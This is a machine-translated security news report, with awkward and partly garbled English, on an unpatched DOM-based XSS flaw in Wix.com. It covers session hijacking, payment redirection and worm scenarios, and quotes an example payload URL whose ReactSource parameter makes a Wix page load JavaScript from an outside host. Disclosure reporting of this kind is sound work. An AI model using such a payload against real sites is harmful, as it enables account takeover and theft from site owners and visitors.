Wix. com there is delay in the repair of the vulnerability millions of websites at risk-vulnerability and early warning-the black bar safety net

ID MYHACK58:62201680895
Type myhack58
Reporter 佚名
Modified 2016-11-05T00:00:00


Foreword Web hosting cloud service provider Wix. com the presence of the Dom typeXSSvulnerability that can allow an attacker to control in this platform hosted on any one site. Contrast Security's senior security researcher Matt Austin said,“the only need in the Wix create site to add a single parameter, the attacker can get their malicious JavaScript code on the website loaded.” Austin said that, although back in October when it has been the vulnerability information to Wix briefing, but the deadline to this Wednesday, this vulnerability still has not been repaired. Wix. com also not this report had any reply. According to Wix. com to official statistics, in the platform a total of 8 6 0 0 million users. According to the OWASP report, this vulnerability is different from the traditionalXSSvulnerability, payload is stored in an HTTP(S)request response page, the DOM typeXSSvulnerability through the client-side script to modify the user's browser Document Object Model(DOM)the environment, and the malicious code will affect the client-side code execution. Scene analysis Austin analyzed the 2 kinds of reflection DOM - XSSvulnerabilities in attack scenarios. Wherein a is induced by the Wix site owner to click on a malicious URL link. This URL will load a carefully constructed JavaScript code hijacking the victims browser session information. Then the attacker can overrun the victim's browser session, so he can be like the original user, as the implementation of any operation. The attacker can for the victims of the original control of the Wix website to modify, for example, provided to a third party site administrator rights, or penetrate a Wix e-Commerce sites to steal credit card numbers. Austin said, with Wix. com a site admin Control permissions, you can distribute malicious software that creates a dynamic, distributed, browser-based botnets to steal online currency, and control of the website content and the use of its users. In the Austin described in the second scenario, you can use a carefully constructed URL, the user is induced into a Wix website. The URL through a DOM-typeXSSattack, the JavaScript is loaded into the target Wix. com website. In some situations, through the browser's session information, can be a Wix. com fan site to be modified, so that the music download alternative to malicious software downloads, or will PayPal re-directed to a third-party account. In the DOM XSSattack case, the attacker needs to do is on the server arrangement of a malicious JavaScript, and with a URL pointing to it. For example:“http://matt4592.wixsite.com/music?ReactSource=http to://m-austin.com“it. In this example, the root domain name”http://matt4592.wixsite.com/music”behind the embedded additional“? ReactSource=http://m-austin.com” this is based on the DOMXSSattack payload to create the conditions. PostScript Contrast Security represents and, worse, the use of this flaw, cyber-criminals can attack to expand, turn it into a worm, which in all of the Wix website, this will be similar to the 2 0 0 5 The Year of the infamous Samy worm MySpace worm--is designed to be used for the entire social networking site. Austin said that the lesson told us that want to take over the hosting on Wix millions of websites, in fact do not need to spend too long time.